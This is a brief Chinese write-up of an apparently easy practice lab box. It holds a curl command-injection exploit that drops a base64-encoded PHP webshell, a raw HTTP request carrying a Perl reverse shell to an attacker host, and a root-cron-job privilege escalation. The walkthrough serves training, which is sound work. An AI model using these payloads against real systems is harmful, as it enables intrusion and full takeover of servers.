靶场很简单分数只有10分跟平常做的20分的中级靶场比确实简单
我拿来放松的
算下来30分钟解决战斗
nmap 扫到80端口web界面
是个框架
搜exp https://www.exploit-db.com/exploits/52023
他的脚本可能有点问题看不到回显
我们审脚本直接看到漏洞点所在 命令执行
curl -s -d "sid=foo&hhook=exec&text=echo 'PD9waHAgc3lzdGVtKCRfUE9TVFthXSk7cGhwaW5mbygpOyA/Pg==' | base64 -d > shell.php" -b "sid=foo" http://192.168.167.190/ 这是我改写的exp 写入shelll.php 的webshell
反弹shell阶段
POST /shell.php HTTP/1.1
Host: 192.168.167.190
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
Origin: http://192.168.167.190
Connection: close
Referer: http://192.168.167.190/shell.php
Cookie: sid=9ush9i4fpdsee6uc8rtfue4pkr
Upgrade-Insecure-Requests: 1
a=perl%20-MIO%20-e%20'$p=fork;exit,if($p);$c=new%20IO::Socket::INET(PeerAddr,%22192.168.45.250:80%22);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_%20while<>;'
获取完整tty以后
wget 我们kali上的pspy64 运行 发现有定时任务 执行者是root
又发现该文件所有者是www-data
直接在里面加恶意代码getrootshell
提权成功